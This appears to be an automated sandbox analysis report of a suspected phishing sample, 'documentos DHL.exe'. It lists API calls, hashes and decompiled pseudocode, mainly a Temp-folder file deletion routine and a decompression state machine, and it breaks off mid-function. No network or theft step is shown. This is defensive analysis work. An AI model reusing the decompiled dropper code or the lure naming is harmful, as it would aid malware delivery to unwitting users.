0x10001b8a
0x10001d83
0x10001d88
0x10001d8d
0x10001d91
0x100021c5
0x100021cb
0x10001da3
0x10001da5
0x10001da6
0x100020ee
0x100020ee
0x100020f1
0x100020f4
0x10002111
0x10002117
0x10002119
0x1000211f
0x10002136
0x10002136
0x10002136
0x10002143
0x10002149
0x1000214c
0x10002152
0x10002154
0x10002158
0x1000215a
0x10002161
0x10002166
0x10002169
0x1000216b
0x10002170
0x10002182
0x10002182
0x10002170
0x10002169
0x10002158
0x10002188
0x1000218b
0x10002195
0x1000219d
0x100021aa
0x100021b0
0x100021b3
0x100020e3
0x100020e3
0x00000000
0x100020e3
0x100021b9
0x100021bf
0x100021bf
0x00000000
0x00000000
0x100021c1
0x100021c1
0x100021c1
0x100021c1
0x00000000
0x1000218d
0x1000218d
0x10002193
0x00000000
0x00000000
0x00000000
0x10002193
0x1000218b
0x10002122
0x10002128
0x1000212a
0x10002130
0x00000000
0x00000000
0x00000000
0x10002130
0x100020f6
0x100020fd
0x10002103
0x10002109
0x00000000
0x10002109
0x10001dac
0x10001dad
0x100020cd
0x100020cd
0x100020d3
0x100020d6
0x00000000
0x00000000
0x100020dd
0x100020e2
0x00000000
0x100020e2
0x10001db4
0x00000000
0x00000000
0x10001dba
0x10001dba
0x10001dc3
0x10001dc8
0x10001dce
0x00000000
0x00000000
0x10001dd4
0x10001de1
0x10001de7
0x10001df1
0x10001df7
0x10001dff
0x10001e0f
0x00000000
0x10001e0f

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000002.00000002.1825292109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.1825259905.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825336540.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825369944.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_documentos DHL.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00405ABE Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405ABE(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405D89(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2e8 =  *0x42a2e8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E004063B0(0x425730, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405CCD(_t68);
					} else {
						lstrcatW(0x425730, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425730,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E004063B0(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405A76(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405414(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2e8 =  *0x42a2e8 + 1;
										} else {
											E00405414(0xfffffff1, _t68);
											E00406176(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405ABE(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604); // executed
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425730 - 0x5c;
					if( *0x425730 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E004066F3(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405C81(_t68);
							_t38 = E00405A76(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00405414(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E00405414(0xfffffff1, _t68);
							return E00406176(_t67, _t68, 0);
						}
						L30:
						 *0x42a2e8 =  *0x42a2e8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405ac8
0x00405acd
0x00405ad6
0x00405ad9
0x00405ae1
0x00405ae4
0x00405ae7
0x00405aef
0x00405af1
0x00405af2
0x00000000
0x00405af2
0x00405afd
0x00405b00
0x00405b00
0x00405b00
0x00405b04
0x00405b17
0x00405b1e
0x00405b23
0x00405b27
0x00405b37
0x00405b29
0x00405b2f
0x00405b2f
0x00405b3c
0x00405b40
0x00405b4c
0x00405b52
0x00405b57
0x00405b5d
0x00405b68
0x00405b6e
0x00405b70
0x00405b73
0x00405c1d
0x00405c1d
0x00405c21
0x00405c23
0x00405c23
0x00405c23
0x00405c23
0x00000000
0x00000000
0x00000000
0x00000000
0x00405b79
0x00405b79
0x00405b79
0x00405b81
0x00405ba1
0x00405ba9
0x00405bae
0x00405bb5
0x00405bd0
0x00405bd5
0x00405bd7
0x00405bfb
0x00405bd9
0x00405bd9
0x00405bdc
0x00405bf0
0x00405bde
0x00405be1
0x00405be9
0x00405be9
0x00405bdc
0x00405bb7
0x00405bbd
0x00405bbf
0x00405bc5
0x00405bc5
0x00405bbf
0x00000000
0x00405bb5
0x00405b83
0x00405b8b
0x00000000
0x00000000
0x00405b8d
0x00405b95
0x00000000
0x00000000
0x00405b97
0x00405b9f
0x00000000
0x00000000
0x00000000
0x00405c00
0x00405c08
0x00405c0e
0x00405c0e
0x00405c17
0x00000000
0x00405c17
0x00405b42
0x00405b4a
0x00000000
0x00000000
0x00000000
0x00405b06
0x00405b06
0x00405b08
0x00405c28
0x00405c2a
0x00405c2d
0x00405c7e
0x00405c7e
0x00405c7e
0x00405c2f
0x00405c32
0x00405c3d
0x00405c42
0x00405c44
0x00000000
0x00000000
0x00405c47
0x00405c53
0x00405c58
0x00405c5a
0x00000000
0x00405c75
0x00405c5c
0x00405c5f
0x00000000
0x00000000
0x00405c64
0x00000000
0x00405c6b
0x00405c34
0x00405c34
0x00000000
0x00405c34
0x00405b0e
0x00405b11
0x00000000
0x00000000
0x00000000
0x00405b11

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76522EE0,00000000), ref: 00405AE7
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb5C10.tmp,\*.*), ref: 00405B2F
lstrcatW.KERNEL32(?,0040A014), ref: 00405B52
lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsb5C10.tmp,?,?,C:\Users\user\AppData\Local\Temp\,76522EE0,00000000), ref: 00405B58
FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsb5C10.tmp,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsb5C10.tmp,?,?,C:\Users\user\AppData\Local\Temp\,76522EE0,00000000), ref: 00405B68
FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C08
FindClose.KERNEL32(00000000), ref: 00405C17

Strings

C:\Users\user\AppData\Local\Temp\nsb5C10.tmp, xrefs: 00405B17, 00405B1D, 00405B2E, 00405B67
"C:\Users\user\Desktop\documentos DHL.exe", xrefs: 00405ABE
C:\Users\user\AppData\Local\Temp\, xrefs: 00405ACC
\*.*, xrefs: 00405B29

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\documentos DHL.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsb5C10.tmp$\*.*
API String ID: 2035342205-153589648
Opcode ID: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
Instruction ID: 07f17dd178ac6d8b62b8dc139a3c49ba2dacd8a3a96bf447fe2624e5f5ce8b98
Opcode Fuzzy Hash: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
Instruction Fuzzy Hash: 1741D030904A18A6DB21AB618D89FBF7678EF42719F50813BF801B11D1D77C5982DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 00406ABA Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00406ABA() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M0040735D))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
